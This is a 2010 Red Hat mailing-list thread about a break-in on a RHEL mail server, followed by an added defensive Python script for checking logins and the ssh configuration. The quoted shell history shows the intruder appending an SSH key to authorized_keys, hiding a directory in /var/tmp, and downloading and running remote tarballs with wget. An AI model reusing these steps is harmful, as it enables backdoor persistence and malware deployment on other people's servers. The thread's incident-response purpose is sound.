Agreed. Also, never allow root login via ssh. Always keep the OS up to date with at least security patches. This should not be news to this audience.

----- Original Message -----
From: redhat-list-bounces@xxxxxxxxxx <redhat-list-bounces@xxxxxxxxxx>
To: General Red Hat Linux discussion list <redhat-list@xxxxxxxxxx>
Sent: Thu Jan 28 08:11:44 2010
Subject: Re: help

Brute force attacks. Leaving root ssh open to the world is begging to be owned like this. Always turn that off or use key-only auth for root on Internet-facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy@xxxxxxxxx> wrote:

> Still I am thinking how he/she got my password??
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:
>
>> I have changed my root password.
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL 5.3 as my mail server with a real IP. I configure my system mostly remotely. The last login time of my system was 27 Jan from this IP, 118.129.153.43.
>>> Then I tried to log in on the morning of 28 Jan and could not get authenticated as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root and ran the "last" command; I am sending the first 10 lines of the last command output... I think someone hacked my system. I am sending the history command output.
>>> Now I have removed the .ssh directory and /var/tmp/*.
>>>
>>> Please suggest what this is??
>>>
>>> Thanks
>>>
>>> last command output:
>>> root     pts/1    117.199.118.234  Thu Jan 28 10:58   still logged in
>>> root     pts/0    117.199.118.234  Thu Jan 28 10:49   still logged in
>>> root     tty1                      Thu Jan 28 10:48 - 10:52  (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>>> root     pts/2    165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>>> root     pts/2    165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>>> root     pts/2    165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>>> root     pts/3    165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>>> root     pts/2    118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>>> root     pts/2    117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>>
>>> What is 165.red-79........? This is not my IP.
>>>
>>> History output:
>>>
>>>   115  cat /proc/cpuinfo
>>>   116  mkdir .ssh
>>>   117  cd .ssh
>>>   118  echo ssh-rsa
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>>   119  cd /var/tmp
>>>   120  mkdir " "
>>>   121  cd " "
>>>   122  passwd
>>>   123  echo ssh-rsa
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 ~/.ssh/authorized_keys
>>>   124  ps -x
>>>   125  cd /var/tmp
>>>   126  w
>>>   127  wget http://kok.ucoz.de/gosh.tgz
>>>   128  tar xvf gosh.tgz
>>>   129  cd gosh
>>>   130  chmod +x *
>>>   131  ./go.sh 121
>>>   132  w
>>>   133  ps -x
>>>   134  ps -aux
>>>   135  cd /var/tmp
>>>   136  cd " "
>>>   137  ls -a
>>>   138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>>   139  tar xzvf fld.tgz
>>>   140  cd fld
>>>   141  chmod +x *
>>>   142  nano cyc.acc
>>>   143  nano cyc.acc.1
>>>   144  nano cyc.set
>>>   145  ./httpd
>>>   146  w
>>>
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
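The advice at the top of the thread (no root login over ssh, key-only auth for root) and the `last` output Joy posted lend themselves to a small triage check. The Python below is an added example, not code from the list or from any poster: the `last` sample is constructed to match the format quoted above, the admin address allowlist is hypothetical, and the script assumes the pre-OpenSSH-7.0 default of `PermitRootLogin yes` that applied to RHEL 5-era sshd.

```python
"""Triage helpers: flag logins from unknown hosts in `last` output, audit sshd_config."""
import re

WEEKDAYS = {"Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"}

# Constructed sample, shaped like the `last` output quoted in the thread.
SAMPLE_LAST = """\
root     pts/1    117.199.118.234  Thu Jan 28 10:58   still logged in
root     tty1                      Thu Jan 28 10:48 - 10:52  (00:04)
reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
root     pts/2    165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
root     pts/2    118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
"""

def parse_last(text):
    """Return (user, tty, host, when) tuples; reboot/wtmp markers are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] in ("reboot", "wtmp", "shutdown"):
            continue
        user, tty = parts[0], parts[1]
        # Console logins (tty1) have an empty host column; the date follows the tty.
        if parts[2] in WEEKDAYS:
            host, rest = "", parts[2:]
        else:
            host, rest = parts[2], parts[3:]
        records.append((user, tty, host, " ".join(rest[:4])))
    return records

def unexpected_logins(records, known_hosts):
    """Remote logins whose source host is not in the admin allowlist (console excluded)."""
    return [r for r in records if r[2] and r[2] not in known_hosts]

def risky_sshd_settings(config_text):
    """Return sshd_config directives that leave root exposed to password guessing."""
    effective = {}
    for line in config_text.splitlines():
        line = line.split("#", 1)[0].strip()
        m = re.match(r"(\w+)\s+(\S+)", line)
        if m and m.group(1) not in effective:  # sshd honours the first occurrence
            effective[m.group(1)] = m.group(2).lower()
    findings = []
    # Default "yes" assumed for older OpenSSH (RHEL 5 era); key-only values are acceptable.
    if effective.get("PermitRootLogin", "yes") not in ("no", "without-password", "prohibit-password"):
        findings.append("PermitRootLogin")
    if effective.get("PasswordAuthentication", "yes") != "no":
        findings.append("PasswordAuthentication")
    return findings
```

Run against the real `last` output and `/etc/ssh/sshd_config` on the box; any host flagged by `unexpected_logins` is a session to account for, and an empty result from `risky_sshd_settings` means root is at least not reachable with a guessed password.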